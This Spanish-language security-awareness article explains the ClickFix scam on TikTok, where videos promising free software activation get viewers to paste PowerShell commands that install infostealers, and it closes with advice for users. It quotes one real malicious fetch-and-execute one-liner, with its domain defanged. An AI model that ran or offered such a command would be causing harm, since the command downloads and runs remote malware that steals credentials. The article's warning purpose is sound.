Una nueva ola de estafas dirigida a usuarios de TikTok ha encendido las alertas de la comunidad de ciberseguridad: videos cortos que prometen activar o “arreglar” software de pago a coste cero llevan a víctimas a ejecutar comandos que, en segundos, comprometen sus equipos. La táctica forma parte de una familia de fraudes conocida como ClickFix y ha sido documentada por investigadores del SANS Internet Storm Center y múltiples empresas de seguridad.
¿En qué consiste el engaño?
Los videos —breves, estilizados y con instrucciones fáciles— invitan al espectador a copiar y pegar un comando en herramientas del sistema (por ejemplo, PowerShell en Windows o la ventana Ejecutar). A simple vista parecen “atajos” o activadores para programas como Photoshop, Spotify o Windows, pero en realidad esos comandos contactan a servidores remotos que descargan y ejecutan scripts maliciosos en el dispositivo. No hay descarga visible de un fichero: basta con pegar la línea de texto sugerida para que el código se ejecute. Un ejemplo real difundido por los analistas muestra un comando que aparenta activar Photoshop pero que en la práctica invoca contenido remoto y lanza otro script: iex (irm slmgr[.]win/photoshop) — una instrucción que, al ejecutarse, puede traer y correr código dañino.
¿Qué consecuencias tiene para la víctima?
Según los análisis, los scripts instalados suelen ser infostealers (software que roba contraseñas, cookies y datos de navegadores), o puertas traseras que abren el sistema a cargas adicionales —lo que puede derivar en robo de credenciales, fraude financiero y pérdida de privacidad. En algunos reportes se menciona que variantes recientes han distribuido familias como Aura Stealer y otras herramientas que exfiltran información sensible.
¿Por qué es tan efectivo este método?
ClickFix explota la confianza y la urgencia: los contenidos parecen “truquitos” técnicos fáciles y la gente está habituada a copiar-pegar soluciones rápidas encontradas en redes. Además, al requerir la interacción directa del usuario (pegar y ejecutar un comando), el ataque puede evadir muchas defensas automáticas y filtros que detectan descargas o enlaces maliciosos.
Dónde se ha visto y quién lo detectó
Investigadores del SANS Internet Storm Center documentaron casos concretos en TikTok y publicaron un análisis sobre cómo los videos promueven líneas de PowerShell que terminan comprometiendo máquinas. Empresas de seguridad y medios especializados —entre ellos Bitdefender, TechRadar y Cybernews— han publicado advertencias y análisis que confirman la propagación de la campaña en las últimas semanas.
Recomendaciones prácticas para usuarios
No pegues ni ejecutes comandos que encuentres en redes sociales o foros, por inofensivos que parezcan.
Nunca abras PowerShell, Terminal o Ejecutar por instrucciones de videos o mensajes de desconocidos.
Mantén sistema operativo y antivirus actualizados; algunos ataques modernos aún así exigen interacción del usuario, pero las actualizaciones reducen el riesgo general. Microsoft
Verifica la fuente: si un “truco” parece demasiado bueno, búscalo en fuentes oficiales o en sitios de seguridad reconocidos antes de probarlo.
Si crees que ejecutaste algo sospechoso, desconecta el equipo de la red y busca asistencia profesional para análisis forense o restauración. Help Net Security
Conclusión
La campaña ClickFix es un recordatorio de que la ingeniería social sigue siendo el vector preferido por los delincuentes: no siempre se necesita un archivo adjunto o un enlace malicioso visible. La sencillez del “copia-pega” es su mayor arma. Usuarios y creadores de contenido deben extremar precauciones: un tutorial viral no vale la pérdida de contraseñas, cuentas o datos personales.
